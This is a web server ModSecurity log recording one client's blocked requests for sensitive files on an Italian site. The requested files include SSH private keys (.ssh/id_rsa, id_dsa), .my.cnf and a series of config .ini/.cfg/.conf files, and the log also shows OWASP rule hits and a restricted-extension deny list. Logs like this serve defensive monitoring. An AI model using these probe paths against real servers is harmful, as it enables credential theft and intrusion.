[Tue May 27 15:13:32.936579 2025] [:error] [pid 3434643] [client 185.146.232.218:43224] [client 185.146.232.218] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_rsa"] [unique_id "aDW6fDcx-eYxvKPm3wqRHgAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:13:32.936927 2025] [:error] [pid 3434643] [client 185.146.232.218:43224] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_rsa"] [unique_id "aDW6fDcx-eYxvKPm3wqRHgAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:13:32.937105 2025] [:error] [pid 3434643] [client 185.146.232.218:43224] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_rsa"] [unique_id "aDW6fDcx-eYxvKPm3wqRHgAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:13:43.086943 2025] [:error] [pid 3435307] [client 185.146.232.218:25800] [client 185.146.232.218] ModSecurity: Warning. Matched phrase ".ssh/id_dsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_dsa found within REQUEST_FILENAME: /.ssh/id_dsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_dsa"] [unique_id "aDW6h_8iIWre8jY-cNxR3AAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:13:43.087286 2025] [:error] [pid 3435307] [client 185.146.232.218:25800] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_dsa"] [unique_id "aDW6h_8iIWre8jY-cNxR3AAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:13:43.087464 2025] [:error] [pid 3435307] [client 185.146.232.218:25800] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_dsa"] [unique_id "aDW6h_8iIWre8jY-cNxR3AAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:13:58.543193 2025] [:error] [pid 3435317] [client 185.146.232.218:16582] [client 185.146.232.218] ModSecurity: Warning. Matched phrase ".ssh/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/config found within REQUEST_FILENAME: /.ssh/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/config"] [unique_id "aDW6ln4CeMAvTJAIhKuk3QAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:13:58.543543 2025] [:error] [pid 3435317] [client 185.146.232.218:16582] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/config"] [unique_id "aDW6ln4CeMAvTJAIhKuk3QAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:13:58.544023 2025] [:error] [pid 3435317] [client 185.146.232.218:16582] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/config"] [unique_id "aDW6ln4CeMAvTJAIhKuk3QAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:14:24.405221 2025] [:error] [pid 3435315] [client 185.146.232.218:60310] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/install.ini"] [unique_id "aDW6sIMZxRfo8GmAcSTjXQAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:14:24.405757 2025] [:error] [pid 3435315] [client 185.146.232.218:60310] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/install.ini"] [unique_id "aDW6sIMZxRfo8GmAcSTjXQAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:14:24.405927 2025] [:error] [pid 3435315] [client 185.146.232.218:60310] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/install.ini"] [unique_id "aDW6sIMZxRfo8GmAcSTjXQAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:14:40.101419 2025] [:error] [pid 3435311] [client 185.146.232.218:8692] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/db.ini"] [unique_id "aDW6wMcVU5YaHAERsMJjZgAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:14:40.102178 2025] [:error] [pid 3435311] [client 185.146.232.218:8692] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/db.ini"] [unique_id "aDW6wMcVU5YaHAERsMJjZgAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:14:40.102414 2025] [:error] [pid 3435311] [client 185.146.232.218:8692] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/db.ini"] [unique_id "aDW6wMcVU5YaHAERsMJjZgAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:14:55.438320 2025] [:error] [pid 3435308] [client 185.146.232.218:24524] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/database.ini"] [unique_id "aDW6zxpsgQ-cVRubiE_pKAAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:14:55.438875 2025] [:error] [pid 3435308] [client 185.146.232.218:24524] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database.ini"] [unique_id "aDW6zxpsgQ-cVRubiE_pKAAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:14:55.439069 2025] [:error] [pid 3435308] [client 185.146.232.218:24524] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database.ini"] [unique_id "aDW6zxpsgQ-cVRubiE_pKAAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:15:10.565071 2025] [:error] [pid 3435313] [client 185.146.232.218:58210] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/pleskwp.ini"] [unique_id "aDW63hc-bm3P_kMSA92eJQAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:15:10.565617 2025] [:error] [pid 3435313] [client 185.146.232.218:58210] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/pleskwp.ini"] [unique_id "aDW63hc-bm3P_kMSA92eJQAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:15:10.565787 2025] [:error] [pid 3435313] [client 185.146.232.218:58210] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/pleskwp.ini"] [unique_id "aDW63hc-bm3P_kMSA92eJQAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:15:25.495887 2025] [:error] [pid 3434643] [client 185.146.232.218:54126] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config.ini"] [unique_id "aDW67Tcx-eYxvKPm3wqRHwAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:15:25.496457 2025] [:error] [pid 3434643] [client 185.146.232.218:54126] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config.ini"] [unique_id "aDW67Tcx-eYxvKPm3wqRHwAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:15:25.496639 2025] [:error] [pid 3434643] [client 185.146.232.218:54126] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config.ini"] [unique_id "aDW67Tcx-eYxvKPm3wqRHwAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:15:30.814298 2025] [:error] [pid 3435307] [client 185.146.232.218:59904] [client 185.146.232.218] ModSecurity: Warning. Matched phrase ".my.cnf" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .my.cnf found within REQUEST_FILENAME: /.my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.my.cnf"] [unique_id "aDW68v8iIWre8jY-cNxR3QAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:15:30.814646 2025] [:error] [pid 3435307] [client 185.146.232.218:59904] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.my.cnf"] [unique_id "aDW68v8iIWre8jY-cNxR3QAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:15:30.814821 2025] [:error] [pid 3435307] [client 185.146.232.218:59904] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.my.cnf"] [unique_id "aDW68v8iIWre8jY-cNxR3QAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:15:54.903095 2025] [:error] [pid 3435317] [client 185.146.232.218:57826] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config.cfg"] [unique_id "aDW7Cn4CeMAvTJAIhKuk3gAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:15:54.903664 2025] [:error] [pid 3435317] [client 185.146.232.218:57826] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config.cfg"] [unique_id "aDW7Cn4CeMAvTJAIhKuk3gAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:15:54.903839 2025] [:error] [pid 3435317] [client 185.146.232.218:57826] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config.cfg"] [unique_id "aDW7Cn4CeMAvTJAIhKuk3gAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:16:10.062601 2025] [:error] [pid 3435316] [client 185.146.232.218:29498] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config/config.cfg"] [unique_id "aDW7Giw1TIthxW7dZehD7QAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:16:10.063167 2025] [:error] [pid 3435316] [client 185.146.232.218:29498] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/config.cfg"] [unique_id "aDW7Giw1TIthxW7dZehD7QAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:16:10.063344 2025] [:error] [pid 3435316] [client 185.146.232.218:29498] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/config.cfg"] [unique_id "aDW7Giw1TIthxW7dZehD7QAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:16:25.213012 2025] [:error] [pid 3434646] [client 185.146.232.218:6640] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.restore.conf"] [unique_id "aDW7KQBjkyyU9gihc4sPBwAAAAQ"], referer: https://economiasolidale.38121.it/
